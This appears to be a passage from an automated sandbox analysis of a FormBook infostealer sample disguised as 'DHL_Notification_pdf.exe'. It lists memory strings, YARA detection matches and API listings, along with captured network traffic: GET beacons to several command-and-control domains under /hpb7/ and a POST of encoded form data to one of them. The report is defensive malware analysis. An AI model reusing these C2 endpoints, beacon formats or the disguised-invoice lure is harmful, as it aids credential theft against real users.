          Source: explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.creative-shield.comReferer:
          Source: explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.511253808.00000000047AE000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.denko-kosan.com
          Source: explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.511253808.00000000047AE000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.denko-kosan.com/hpb7/
          Source: explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.denko-kosan.comReferer:
          Source: explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.kotelak.ru
          Source: explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.kotelak.ru/hpb7/
          Source: explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.kotelak.ruReferer:
          Source: explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.kunimi.org
          Source: explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.kunimi.org/hpb7/
          Source: explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.kunimi.org/hpb7/I
          Source: explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.madliainsalu.com
          Source: explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.madliainsalu.com/hpb7/
          Source: explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.madliainsalu.comReferer:
          Source: explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mindsetlighting.xyz
          Source: explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mindsetlighting.xyz/hpb7/
          Source: explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mindsetlighting.xyzReferer:
          Source: explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.rifleroofers.com
          Source: explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.rifleroofers.com/hpb7/
          Source: explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.rifleroofers.comReferer:
          Source: explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.traindic.top
          Source: explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.traindic.top/hpb7/
          Source: explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yongleproducts.com
          Source: explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yongleproducts.com/hpb7/
          Source: cmmon32.exe, 00000005.00000002.509147113.0000000000F05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.yongleproducts.com/hpb7/?MWgiD_=Gt_IudmBZP&pgoMAr2=qNzMMFnF92wYqby
          Source: 146E771M.5.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
          Source: 146E771M.5.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: 146E771M.5.drString found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: cmmon32.exe, 00000005.00000003.381521454.0000000007C36000.00000004.00000020.00020000.00000000.sdmp, 146E771M.5.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
          Source: 146E771M.5.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: cmmon32.exe, 00000005.00000003.381521454.0000000007C36000.00000004.00000020.00020000.00000000.sdmp, 146E771M.5.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
          Source: cmmon32.exe, 00000005.00000003.381521454.0000000007C36000.00000004.00000020.00020000.00000000.sdmp, 146E771M.5.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
          Source: cmmon32.exe, 00000005.00000003.381521454.0000000007C36000.00000004.00000020.00020000.00000000.sdmp, 146E771M.5.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
          Source: cmmon32.exe, 00000005.00000003.381521454.0000000007C36000.00000004.00000020.00020000.00000000.sdmp, 146E771M.5.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
          Source: cmmon32.exe, 00000005.00000003.381521454.0000000007C36000.00000004.00000020.00020000.00000000.sdmp, 146E771M.5.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
          Source: unknownHTTP traffic detected: POST /hpb7/ HTTP/1.1Host: www.kunimi.orgConnection: closeContent-Length: 193Cache-Control: no-cacheOrigin: http://www.kunimi.orgUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.kunimi.org/hpb7/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 70 67 6f 4d 41 72 32 3d 47 75 61 75 64 39 45 4f 77 48 76 76 68 62 77 68 55 70 32 5f 62 59 48 39 4f 65 73 6d 4f 5a 6c 61 76 33 55 61 6d 59 76 44 30 34 4c 4d 49 46 6d 4b 37 6a 61 33 72 71 57 59 66 61 6f 53 34 41 7a 58 48 5a 6c 72 54 63 71 45 75 65 68 32 70 50 69 6a 67 35 4e 71 62 74 42 72 79 38 78 4a 38 52 71 56 4a 7a 7a 39 58 33 43 2d 69 69 33 4f 56 4f 4d 48 6a 67 4d 72 61 51 59 64 79 70 39 4d 28 43 33 37 52 2d 42 49 50 47 33 5a 4d 5a 73 6b 6f 73 6b 4f 5a 63 71 39 38 58 43 52 6c 6d 31 4f 38 4f 4a 49 68 52 6d 6b 33 2d 62 70 38 4d 73 30 7a 41 28 4d 62 67 79 61 5a 5f 59 2e 00 00 00 00 00 00 00 00 Data Ascii: pgoMAr2=Guaud9EOwHvvhbwhUp2_bYH9OesmOZlav3UamYvD04LMIFmK7ja3rqWYfaoS4AzXHZlrTcqEueh2pPijg5NqbtBry8xJ8RqVJzz9X3C-ii3OVOMHjgMraQYdyp9M(C37R-BIPG3ZMZskoskOZcq98XCRlm1O8OJIhRmk3-bp8Ms0zA(MbgyaZ_Y.
          Source: unknownDNS traffic detected: queries for: www.yongleproducts.com
          Source: global trafficHTTP traffic detected: GET /hpb7/?pgoMAr2=BrlYCq9+qqzfybZpwXKugHGOc0m4ktDYrdhK4pNzcFj3giICUF3BZQEP3ssdPmgNj5Kg/PdRxbVpWQCkOBnfQOgdZDSA0ZYkxsRLP7vho3iJ&MWgiD_=Gt_IudmBZP HTTP/1.1Host: www.0dhy.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hpb7/?MWgiD_=Gt_IudmBZP&pgoMAr2=LsyOeIgM/ET1t5hHa8GhcP6qBeQiLfhDrF81hKHttqb/Il/dsCibnuekbaxwoyPtCZtmftv1iNZwvaen+NIbedtv8fxp/SmPPkaBaUqgtGDC HTTP/1.1Host: www.kunimi.orgConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hpb7/?pgoMAr2=bTtFiHq0GQrF6aFlJXqsXsYFYYSgPtrX4CJLxcpJGK/F7H1QBurO56xriJCe1rAnTJlhkBPAE1A8g1vh/R7dLaG3D1YJBFes4W4zIdoETPhG&MWgiD_=Gt_IudmBZP HTTP/1.1Host: www.traindic.topConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hpb7/?MWgiD_=Gt_IudmBZP&pgoMAr2=+QEmeUzOQAV/evbBmcNZRFxNHMmEBYUw3TD399HaSALRcdrdntvE2stvjFfWDoHleQ7kMHGKc1CQfriDp0h38HiNDm4XeyJxX5vlkTTrS1xP HTTP/1.1Host: www.bohndigitaltech.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hpb7/?pgoMAr2=Sr1AjUgE1bmYtN0hdeH1+2eYW2bz9zJIy7x8VWFTjEXaDkIuvqWhFoT+O4ddqC6+eWArdJNQDIDq/++CVSPCikRZslZ7vUOEqSXS/sLR9FgE&MWgiD_=Gt_IudmBZP HTTP/1.1Host: www.rifleroofers.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hpb7/?MWgiD_=Gt_IudmBZP&pgoMAr2=NuHAd+vfjtmC4E+cdz1CpM6J6ScGh9KWfGXGi6oH+281UYUkr6SouFSZ7LMQAOLiSk3FYsgr8Pu9aCQzqq/MT4aa5FcMBKGUU6DgJQXharGK HTTP/1.1Host: www.denko-kosan.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: C:\Users\user\Desktop\DHL_Notification_pdf.exeCode function: 0_2_00405809 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 3.2.ldndbi.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.ldndbi.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000002.508997363.0000000000E50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.508740330.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.290138385.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.290222663.0000000000490000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.292007151.0000000000D20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.509702408.00000000011A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 3.2.ldndbi.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 3.2.ldndbi.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.ldndbi.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 3.2.ldndbi.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.508997363.0000000000E50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.508997363.0000000000E50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.508740330.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.508740330.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.290138385.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.290138385.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.290222663.0000000000490000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.290222663.0000000000490000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.292007151.0000000000D20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.292007151.0000000000D20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.509702408.00000000011A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.509702408.00000000011A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Initial sample is a PE file and has a suspicious name
          Source: initial sampleStatic PE information: Filename: DHL_Notification_pdf.exe
          Source: DHL_Notification_pdf.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: 3.2.ldndbi.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 3.2.ldndbi.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.ldndbi.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 3.2.ldndbi.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.508997363.0000000000E50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.508997363.0000000000E50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.508740330.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.508740330.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.290138385.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.290138385.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.290222663.0000000000490000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.290222663.0000000000490000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.292007151.0000000000D20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.292007151.0000000000D20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.509702408.00000000011A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.509702408.00000000011A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: C:\Users\user\Desktop\DHL_Notification_pdf.exeCode function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\DHL_Notification_pdf.exeCode function: 0_2_00406D5F
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 1_2_00410371
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00405843
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00401801
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00401803
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00401810
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_004038C3
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_004228C4
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_004230E8
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_004038B9
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_0042219B
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00401A65
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00422211
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00421A8C
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00401BA0
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_004223BA
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00401CA5
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00401CB0
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_0040561A
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00420623
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00405623
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00422EAB
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_0040BFEE
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_0040BFF3
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00421F81
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A420A0
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00AE20A8
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A2B090
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00AE28EC
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00AEE824
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00AD1002
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A34120
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A1F900
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00AE22AE
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A4EBB0
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00ADDBD2
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00AE2B28
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A2841F
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00ADD466
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A42581
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A2D5E0
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00AE25DD
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A10D20
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00AE2D07
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00AE1D55
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00AE2EF7
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00A36E30
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00ADD616
          Source: C:\Users\user\AppData\Local\Temp\ldndbi.exeCode function: 3_2_00AE1FF1
